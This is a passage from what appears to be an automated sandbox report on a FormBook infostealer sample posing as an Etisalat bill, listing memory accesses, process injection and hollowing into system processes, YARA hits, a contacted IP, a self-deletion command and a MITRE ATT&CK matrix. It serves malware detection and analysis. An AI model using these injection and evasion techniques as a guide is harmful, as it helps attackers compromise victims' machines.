          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]2_2_030DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]2_2_03104940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BB81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00BB81F7
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B8A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B8A395
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B8A364 SetUnhandledExceptionFilter,0_2_00B8A364
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00AE14D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00AE14D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00AE1720 SetUnhandledExceptionFilter,4_2_00AE1720

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.212 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 1028Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: AD0000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3D5008Jump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BB8C93 LogonUserW,0_2_00BB8C93
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B63B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B63B4C
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B64A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B64A35
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC4EF5 mouse_event,0_2_00BC4EF5
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BB81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00BB81F7
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00BC4C03
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009BAB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097350645.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4440374748.0000000009C22000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000003.00000002.4436303863.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1984929621.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, explorer.exe, 00000003.00000000.1987387390.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4436303863.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4436303863.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1984929621.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.4436303863.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1984929621.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.1984137614.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4435480864.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B8886B cpuid 0_2_00B8886B
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B950D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B950D7
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BA2230 GetUserNameW,0_2_00BA2230
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B9418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B9418A
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B64AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B64AFE

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeBinary or memory string: WIN_81
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeBinary or memory string: WIN_XP
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeBinary or memory string: WIN_XPe
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeBinary or memory string: WIN_VISTA
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeBinary or memory string: WIN_7
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeBinary or memory string: WIN_8
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BD6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00BD6596
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BD6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00BD6A5A

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		21
          Input Capture          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol21
          Input Capture          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          Command and Scripting Interpreter          		Logon Script (Windows)2
          Valid Accounts          		2
          Obfuscated Files or Information          		Security Account Manager1
          File and Directory Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
